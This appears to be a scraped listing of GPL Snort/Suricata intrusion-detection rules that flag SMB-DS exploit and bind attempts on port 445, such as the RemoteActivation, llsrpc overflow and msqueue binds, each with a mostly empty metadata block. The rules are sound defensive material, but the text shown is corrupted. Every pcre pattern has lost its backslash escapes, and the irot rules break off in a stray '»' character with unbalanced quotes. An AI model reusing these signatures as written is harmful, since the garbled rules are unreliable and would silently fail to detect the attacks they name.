CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103423

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS RemoteActivation unicode andx attempt"; flow:established,to_server; flowbits:isset,dce.iactivation.bind; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; content:"|5C 00 5C 00|"; byte_test:4,>,256,8; classtype:protocol-command-decode; sid:2103423; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS RemoteActivation unicode andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103424

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS RemoteActivation unicode little endian andx attempt"; flow:established,to_server; flowbits:isset,dce.iactivation.bind; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; content:"|5C 00 5C 00|"; byte_test:4,>,256,8,little; classtype:protocol-command-decode; sid:2103424; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS RemoteActivation unicode little endian andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103004

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS Session Setup NTMLSSP andx asn1 overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"s"; depth:1; offset:39; byte_jump:2,0,little,relative; byte_test:4,&,2147483648,21,relative,little; content:!"NTLMSSP"; within:7; distance:27; asn1:double_overflow, bitstring_overflow, relative_offset 27, oversize_length 2048; reference:bugtraq,9633; reference:bugtraq,9635; reference:cve,2003-0818; reference:nessus,12052; reference:nessus,12065; reference:url,www.microsoft.com/technet/security/bulletin/MS04-007.mspx; classtype:protocol-command-decode; sid:2103004; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS Session Setup NTMLSSP andx asn1 overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,9633|bugtraq,9635|cve,2003-0818|nessus,12052|nessus,12065|url,www.microsoft.com/technet/security/bulletin/MS04-007.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103005

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS Session Setup NTMLSSP unicode andx asn1 overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"s"; depth:1; offset:39; byte_jump:2,0,little,relative; byte_test:4,&,2147483648,21,relative,little; content:!"NTLMSSP"; within:7; distance:27; asn1:double_overflow, bitstring_overflow, relative_offset 27, oversize_length 2048; reference:bugtraq,9633; reference:bugtraq,9635; reference:cve,2003-0818; reference:nessus,12052; reference:nessus,12065; reference:url,www.microsoft.com/technet/security/bulletin/MS04-007.mspx; classtype:protocol-command-decode; sid:2103005; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS Session Setup NTMLSSP unicode andx asn1 overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,9633|bugtraq,9635|cve,2003-0818|nessus,12052|nessus,12065|url,www.microsoft.com/technet/security/bulletin/MS04-007.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103142

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS Trans2 FIND_FIRST2 andx attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; content:"2"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|01 00|"; within:2; distance:29; flowbits:set,smb.trans2; flowbits:noalert; classtype:protocol-command-decode; sid:2103142; rev:3; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS Trans2 FIND_FIRST2 andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 3

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103252

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS irot andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|9E E7 B9|R=|CE 11 AA A1 00 00|i|01 29|?»; within:16; distance:29; flowbits:set,smb.tree.bind.irot; flowbits:noalert; classtype:protocol-command-decode; sid:2103252; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)
`

Name : SMB-DS irot andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103253

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS irot little endian andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|9E E7 B9|R=|CE 11 AA A1 00 00|i|01 29|?»; within:16; distance:29; flowbits:set,smb.tree.bind.irot; flowbits:noalert; classtype:protocol-command-decode; sid:2103253; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)
`

Name : SMB-DS irot little endian andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103254

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS irot unicode andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|9E E7 B9|R=|CE 11 AA A1 00 00|i|01 29|?»; within:16; distance:29; flowbits:set,smb.tree.bind.irot; flowbits:noalert; classtype:protocol-command-decode; sid:2103254; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)
`

Name : SMB-DS irot unicode andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103255

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS irot unicode little endian andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|9E E7 B9|R=|CE 11 AA A1 00 00|i|01 29|?»; within:16; distance:29; flowbits:set,smb.tree.bind.irot; flowbits:noalert; classtype:protocol-command-decode; sid:2103255; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)
`

Name : SMB-DS irot unicode little endian andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103126

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS llsrconnect andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.llsrpc; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; byte_test:4,>,52,0,relative; reference:url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx; classtype:attempted-admin; sid:2103126; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS llsrconnect andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103127

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS llsrconnect little endian andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.llsrpc; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; byte_test:4,>,52,0,relative; reference:url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx; classtype:attempted-admin; sid:2103127; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS llsrconnect little endian andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103128

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS llsrconnect unicode andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.llsrpc; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; byte_test:4,>,104,0,relative; reference:url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx; classtype:attempted-admin; sid:2103128; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS llsrconnect unicode andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103129

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS llsrconnect unicode little endian andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.llsrpc; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; byte_test:4,>,104,0,relative; reference:url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx; classtype:attempted-admin; sid:2103129; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS llsrconnect unicode little endian andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103110

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS llsrpc andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"@|FD|,4l<|CE 11 A8 93 08 00|+.|9C|m"; within:16; distance:29; flowbits:set,smb.tree.bind.llsrpc; classtype:protocol-command-decode; sid:2103110; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS llsrpc andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103096

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS llsrpc andx create tree attempt"; flow:established,to_server; flowbits:isset,smb.tree.connect.ipc; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"|A2|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|5C|llsrpc|00|"; within:8; distance:51; nocase; classtype:protocol-command-decode; sid:2103096; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS llsrpc andx create tree attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103111

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS llsrpc little endian andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"@|FD|,4l<|CE 11 A8 93 08 00|+.|9C|m"; within:16; distance:29; flowbits:set,smb.tree.bind.llsrpc; classtype:protocol-command-decode; sid:2103111; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS llsrpc little endian andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103112

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS llsrpc unicode andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"@|FD|,4l<|CE 11 A8 93 08 00|+.|9C|m"; within:16; distance:29; flowbits:set,smb.tree.bind.llsrpc; classtype:protocol-command-decode; sid:2103112; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS llsrpc unicode andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103097

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS llsrpc unicode andx create tree attempt"; flow:established,to_server; flowbits:isset,smb.tree.connect.ipc; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"|A2|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|5C 00|l|00|l|00|s|00|r|00|p|00|c|00 00 00|"; within:16; distance:51; nocase; classtype:protocol-command-decode; sid:2103097; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS llsrpc unicode andx create tree attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103113

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS llsrpc unicode little endian andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"@|FD|,4l<|CE 11 A8 93 08 00|+.|9C|m"; within:16; distance:29; flowbits:set,smb.tree.bind.llsrpc; classtype:protocol-command-decode; sid:2103113; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS llsrpc unicode little endian andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103172

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS msqueue andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B0 01|R|97 CA|Y|D0 11 A8 D5 00 A0 C9 0D 80|Q"; within:16; distance:29; flowbits:set,smb.tree.bind.msqueue; flowbits:noalert; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:protocol-command-decode; sid:2103172; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS msqueue andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103173

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS msqueue little endian andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B0 01|R|97 CA|Y|D0 11 A8 D5 00 A0 C9 0D 80|Q"; within:16; distance:29; flowbits:set,smb.tree.bind.msqueue; flowbits:noalert; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:protocol-command-decode; sid:2103173; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS msqueue little endian andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103174

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS msqueue unicode andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B0 01|R|97 CA|Y|D0 11 A8 D5 00 A0 C9 0D 80|Q"; within:16; distance:29; flowbits:set,smb.tree.bind.msqueue; flowbits:noalert; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:protocol-command-decode; sid:2103174; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS msqueue unicode andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103175

